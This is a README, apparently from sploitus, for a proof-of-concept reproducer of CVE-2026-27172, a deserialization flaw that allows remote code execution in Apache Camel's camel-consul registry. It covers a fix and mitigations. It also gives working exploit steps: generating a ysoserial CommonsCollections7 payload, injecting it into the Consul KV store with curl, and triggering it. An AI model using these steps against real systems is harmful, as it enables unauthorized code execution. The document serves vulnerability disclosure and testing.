## https://sploitus.com/exploit?id=9535E82E-AEDF-5DBC-82CC-0CA45D25444D
# camel-consul ConsulRegistry Deserialization Vulnerability Reproducer (CVE-2026-27172)
This project demonstrates a **Java deserialization vulnerability** in Apache Camel's
`camel-consul` component (`ConsulRegistry`), tracked as **CVE-2026-27172**. It is the same
class of issue as **CVE-2024-22369**, **CVE-2024-23114** and **CVE-2026-25747**, and was
overlooked during the original remediation of those CVEs.
Advisory: https://camel.apache.org/security/CVE-2026-27172.html
## Vulnerability Summary
| Property | Value |
|----------|-------|
| **Component** | `camel-consul` |
| **Affected Class** | `org.apache.camel.component.consul.ConsulRegistry` (`ConsulRegistryUtils.deserialize`) |
| **Vulnerable Methods** | `lookupByName()`, `lookupByNameAndType()`, `findByTypeWithName()`, `findByType()` |
| **CWE** | CWE-502: Deserialization of Untrusted Data |
| **Impact** | Remote Code Execution (RCE) |
| **Affected Versions** | From 3.0.0 before 4.14.6, and from 4.15.0 before 4.18.1 |
| **Fixed Versions** | 4.14.6, 4.18.1, 4.19.0 |
| **JIRA** | CAMEL-23029 |
## Technical Details
`ConsulRegistry` uses the Consul key/value store as a Camel registry. When a bean is looked
up by name, the stored value is Base64-decoded and deserialized with a raw
`ObjectInputStream` and, **in affected versions, no `ObjectInputFilter`**:
```java
// ConsulRegistry.lookupByName(...)
public Object lookupByName(String key) {
kvClient = consul.keyValueClient();
return kvClient.getValueAsString(key).map(result -> {
byte[] postDecodedValue = ConsulRegistryUtils.decodeBase64(result);
return ConsulRegistryUtils.deserialize(postDecodedValue); // no filter (affected)
}).orElse(null);
}
// ConsulRegistryUtils.deserialize(...) - affected version
static Object deserialize(byte[] bytes) {
try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
return in.readObject(); // NO FILTERING!
}
}
```
Any object stored in the Consul KV store under a key that Camel later looks up is
deserialized. An attacker who can write to that KV path can plant a gadget-chain payload
that executes when the registry lookup happens.
## Prerequisites
- Java 17+
- Maven 3.8+
- A running Consul agent (KV store) โ e.g. via Docker
- ysoserial (for payload generation)
## Reproduction Steps
### Step 1: Start Consul
```bash
docker run -d --name consul -p 8500:8500 hashicorp/consul:1.17 agent -dev -client 0.0.0.0
```
### Step 2: Build and Start the Application
```bash
mvn clean package -DskipTests
mvn spring-boot:run
```
### Step 3: Initialize the Registry Key
```bash
curl http://localhost:8080/exploit/init
```
### Step 4: Generate a Malicious Payload
```bash
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
# Linux (benign proof: create a file). Use "open -a Calculator" on macOS, "calc.exe" on Windows.
java -jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64
```
`ConsulRegistry` stores Base64-encoded serialized objects, so the payload is delivered as
Base64.
### Step 5: Inject the Payload into Consul KV
```bash
curl -X POST http://localhost:8080/exploit/inject \
-H "Content-Type: text/plain" \
--data-binary @payload.b64
```
### Step 6: Trigger Deserialization (RCE!)
```bash
curl http://localhost:8080/exploit/trigger
```
`lookupByName()` reads the KV value, Base64-decodes it, and deserializes it โ executing the
gadget chain.
### Step 7: Verify Exploitation
```bash
ls -la /tmp/pwned
```
If the file `/tmp/pwned` exists, the exploit was successful.
## Attack Vectors
The vulnerability triggers whenever the registry resolves a bean:
1. **Bean references** โ `.to("bean:...")`, `bean(...)`, `.process("...")` by name all call `lookupByName()`.
2. **Startup resolution** โ beans resolved while routes are being built.
3. **Type lookups** โ `findByType()` / `lookupByNameAndType()` iterate KV entries and deserialize them.
## Exploit Conditions
1. **Write access to the Consul KV store** backing the registry:
- A shared or misconfigured Consul cluster
- A compromised/over-scoped Consul ACL token
- Another vulnerability providing a KV write primitive
2. **A gadget library on the classpath**:
- `commons-collections:3.2.1` (CommonsCollections1-7 gadgets)
- Many others (see ysoserial)
## Comparison with the sibling CVEs
| Aspect | Cassandra (CVE-2024-23114) | LevelDB (CVE-2026-25747) | Consul (CVE-2026-27172) |
|--------|----------------------------|--------------------------|-------------------------|
| **Backing store** | Cassandra table | LevelDB file | Consul KV store |
| **ObjectInputFilter (before fix)** | none | none | **none** |
| **Fix** | `ObjectInputFilter` allow-list | `ObjectInputFilter` allow-list | `ObjectInputFilter` allow-list |
| **JIRA** | CAMEL-20306 | CAMEL-22821 | CAMEL-23029 |
## Recommended Fix
The fix (CAMEL-23029) adds a configurable `ObjectInputFilter` (default
`java.**;org.apache.camel.**;!*`) to `ConsulRegistryUtils.deserialize`, and exposes a
`deserializationFilter` option so trusted classes can be allow-listed:
```java
static Object deserialize(byte[] bytes, String deserializationFilter) {
try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
if (deserializationFilter != null) {
in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(deserializationFilter));
}
return in.readObject();
}
}
```
## Mitigation
Until upgrading to a fixed version:
1. **Restrict Consul KV write access** to the Camel application's own identity (least-privilege ACL tokens).
2. **Remove gadget libraries**: upgrade or remove vulnerable libraries such as commons-collections 3.x.
3. **Network segmentation**: isolate the Consul cluster on a trusted network.
## Files
```
CVE-2026-27172/
โโโ pom.xml # Maven configuration (affected camel-consul version)
โโโ README.md # This file
โโโ src/main/
โโโ java/com/example/
โ โโโ Application.java # Spring Boot entry point
โ โโโ ConsulRegistryRoute.java # Camel route (disabled; shows real usage)
โ โโโ ExploitController.java # REST endpoints for the PoC
โโโ resources/
โโโ application.properties
```
## Disclaimer
This reproducer is provided for **security research and authorized testing only**, for a
**publicly disclosed and fixed** vulnerability. Do not use it against systems without
explicit permission.